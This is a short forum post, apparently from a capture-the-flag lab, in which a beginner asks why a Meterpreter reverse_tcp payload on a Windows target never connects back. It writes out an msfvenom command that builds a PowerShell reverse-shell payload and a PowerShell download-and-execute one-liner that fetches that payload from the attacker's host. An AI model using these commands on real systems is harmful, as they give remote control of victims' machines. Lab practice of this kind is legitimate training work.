I’m new and having some issues using the meterpreter/reverse_tcp payload with PS.
Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.
I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.
I generate a payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1
I then execute it from the remote shell (running a local webserver to host):
powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')
However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with nc -lvnp 9001 also doesn’t show any connection being made.
I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?